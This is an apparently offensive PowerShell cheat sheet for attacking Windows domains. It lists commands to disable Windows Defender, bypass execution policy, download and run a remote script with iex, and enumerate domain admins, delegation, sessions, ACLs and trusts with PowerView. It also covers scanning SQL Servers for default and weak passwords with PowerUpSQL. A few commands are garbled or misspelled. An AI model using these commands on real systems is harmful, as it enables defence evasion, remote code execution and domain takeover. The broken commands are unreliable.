# Basics

### Disable Windows Defender

set-mppreference -disablerealtimemonitoring $true

### show language mode

$executioncontext.sessionstate.languagemode

### Change execution policy

set-executionpolicy bypass


### Download script and execute

iex (New-object new.webclient).downloadstring("https://server:port/file.ps1")

# Enumeration

net localgroup 

net localgroup administrators

net group /dom

net group "domain admins" /dom

net user

net user /dom

net user username

net user username /dom

# Powerview

### show domain information

get-netdomain

### show domain sid

get-domainsid

### show dc

get-netdomaincontroller

### show domain users

get-netuser

### show domain users with service principal name

get-netuser -SPN

### show domain users with constrained delegation enabled (Powerview DEV)

get-netdomainuser -trustedauth

### show domain groups

get-netgroup

### show members of group

get-netgroupmember -groupname "Domain admins"

### show domain joined computers

get-netcomputer

### show domain joined computers which unconstrained delegation is enabled 

get-netcomputer -unconstrained

### show domain computers with constrained delegation enabled (Powerview DEV)

get-netdomaincomputer -trustedtoauth

### find localadmin access of other computers

find-localadminaccess

### find local admins on all machines of the domain

invoke-enumeratelocaladmin

### list sessions on a particular computer

get-netsession -computername ops-dc

### find computers where a domain admin is logged in and current user has access

invoke-userhunter -checkaccess

### get the acl associated with the specified object

get-objectacl -samaccountname user -resolveguids

### get the acls associated with the specified prefix to be used for search

get-objectacl -adsprefix 'CN=Administrator,CN=Users' -verbose

### show interesting acls

Invoke-ACLScanner âResolveGUIDs

### show domain trusts

get-netdomaintrust

### show details about current forest

get-netforest

### show all domains in current forest

get-netforestdomain

### show trusts in the forest

get-netforestrust

# Active Directory Module

### show domain information

get-addomain

### show dc

get-addomaincontroller

### show domain users

get-aduser

### show domain group

get-adgroup

### show members of group

get-adgroupmember -identity "Domain admins"

### show domain joined computers

get-adcomputer

## Powersploit Invoke-Portscan

invoke-portscan -hosts ip_address -topports 1000

# PowerUpSQL 

## Discover Remote SQL Server Instances

Get-SQLInstanceScanUDPThreaded -Verbose -ComputerName SQLServer1

## Discover Active Directory Domain SQL Server Instances

Get-SQLInstanceDomain -Verbose

## Get SQL Server Information

Get-SQLServerInfo -Verbose -Instance SQLServer1

## Check SQL Servers for Default Passwords

Get-SQLInstanceDomain | Get-SQLServerLoginDefaultPw -Verbose

## Check SQL Server for Weak Passwords

Invoke-SQLAuditWeakLoginPw -instance computer_name -verbose

## Fuzz SQL Users with Public Permissions

Get-SQLFuzzServerLogin -Instance UFC-SQLDev

## Fuzz SQL Databases with Public Permissions

Get-SQLFuzzDatabaseName -instance UFC-SQLDev